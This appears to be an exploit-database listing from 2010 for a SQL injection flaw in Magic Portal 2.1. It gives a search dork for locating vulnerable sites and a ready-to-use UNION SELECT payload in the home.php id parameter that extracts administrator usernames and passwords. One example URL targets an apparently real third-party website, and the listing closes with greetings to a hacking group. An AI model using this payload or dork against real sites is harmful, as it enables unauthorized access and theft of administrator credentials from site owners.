-
alnjm33 on January 24, 2010
- Magic Portal version 2.1 suffers from a remote SQL injection vulnerability.
- Platforms
- na
- Category
- webapps
- Tags
- exploit remote sql injection
- Source
- packetstormsecurity.org
- Download
-
Exploit Code
Magic Portal 2.1 SQL Injection
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title :magic-portal SQL injection Vulnerability
Author: alnjm33
Software Link:
Version: 2.1
Tested on: Version 2.1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( Powered by magic-portal Version 2.1 )
================================Exploit=============================================
Site/Path/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--
e.g
http://www.a3malnet.org/magic-portal/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--
=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members
Comments
blog comments powered by Disqus